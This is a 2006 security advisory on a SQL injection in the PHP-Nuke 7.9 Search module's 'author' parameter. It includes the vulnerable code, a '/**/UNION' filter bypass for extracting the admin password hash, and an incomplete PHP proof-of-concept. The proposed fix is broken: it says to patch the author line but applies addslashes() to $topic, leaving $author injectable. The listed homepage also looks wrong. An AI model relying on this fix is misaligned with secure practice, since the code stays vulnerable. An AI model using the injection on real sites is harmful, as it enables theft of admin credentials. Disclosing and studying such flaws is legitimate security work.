PHP-Nuke <= 7.9 Search module "author" SQL Injection vulnerability

/*

[N]eo [S]ecurity [T]eam [NST] - Advisory 28 - 2006-10-25

Program: PHP-Nuke
Homepage: http://www.php.net
Vulnerable Versions: PHP-Nuke <= 7.9
Risk: Medium
Impact: Medium Risk

-==PHP-Nuke <= 7.9 Search module "author" SQL Injection vulnerability==-

• Description

---

PHP-Nuke is a news automated system specially designed to be used in Intranets and Internet. The Administrator has total control of his web site, registered users, and he will have in the hand a powerful assembly of tools to maintain an active and 100% interactive web site using databases.

• Tested

---

localhost & many sites

• Vulnerability Description

---

In /modules/Search/index.php the "author" variable is not sanitized correctly. Here is the vulnerable code:

==[ /modules/Search/index.php 196-198 ]==========================
[…]
if (!empty($author)) $q .= "AND s.aid='$author' ";
if (!empty($topic)) $q .= "AND s.topic='$topic' ";
if (!empty($days) && $days!=0) $q .= "AND TO_DAYS(NOW()) - TO_DAYS(time) <= '$days' ";
[…]
==[ end /modules/Search/index.php ]==============================

Register_globals php directive must be turned Off so the simple quotes (') are not filtered. Also we have to know the prefix
used for the database tables ("nuke_" by default).

In this way, bypassing the SQL Injection Protection, like using someone like '/**/UNION ' and not ' UNION ' in our sql injections, we can get the admin md5 hash without any problems.

==Pseudo-Code Proof of Concept exploit==
<?
/*

Neo Security Team - Pseudo-Code Proof of Concept Exploit
http://www.neosecurityteam.net
Paisterist

/
set_time_limit(0);
$host="localhost";
$path="/phpnuke/";
$port="80";
$fp = fsockopen($host, $port, $errno, $errstr, 30);
$data=""; / Here the variables, like "query", "topic" and "author" with the SQL Injection */

if ($fp) {
/* we put the POST request on $p variable, sending the data saved on $data. */

fwrite($fp, $p);

while (!feof($fp)) {
    $content .= fread($fp, 4096);
}

preg_match("/([a-zA-Z0-9]{32})/", $content, $matches);

if ($matches[0])
print "<b>Hash: </b>".$matches[0];

}
?>
==Pseudo-Code Proof of Concept exploit==

Whit this PoC code i get the md5 hash of the first admin (God) of the nuke_authors table.

• How to fix it? More information?

---

You can found a patch on http://www.neosecurityteam.net/foro/

Also, you can modify the line 197 of /modules/Search/index.php, adding slashes before the simple quotes with the addslashes() function:

==[ /modules/Search/index.php 196-198 ]==========================
[…]
if (!empty($author)) $q .= "AND s.aid='$author' ";
if (!empty($topic)) $q .= "AND s.topic='" . addslashes($topic) . "' ";
if (!empty($days) && $days!=0) $q .= "AND TO_DAYS(NOW()) - TO_DAYS(time) <= '$days' ";
[…]
==[ end /modules/Search/index.php ]==============================

That's a momentary solution to the problem. I recommend to download the PHP-Nuke 8.0 version in the next days… it is not
free at the moment.

• References

---

http://www.neosecurityteam.net/index.php?action=advisories&amp;id=28

• Credits

---

Search module SQL Injection discovered by Paisterist -> paisterist[dot]nst [at] gmail[dot]com

[N]eo [S]ecurity [T]eam [NST] - http://www.neosecurityteam.net/

• Greets

---

HaCkZaTaN
K4P0
Daemon21
Link
0m3gA_x
LINUX
nitrous
m0rpheus
nikyt0x
KingMetal
Knightmare

Argentina, Colombia, Chile, Bolivia, Uruguay EXISTS!!

@@@@'''@@@@'@@@@@@@@@'@@@@@@@@@@@
'@@@@@''@@'@@@''''''''@@''@@@''@@
'@@'@@@@@@''@@@@@@ @@@'''''@@@
'@@'''@@@@'''''''''@@@''''@@@
@@@@''''@@'@@@@@@@@@@''''@@@@@

/* EOF */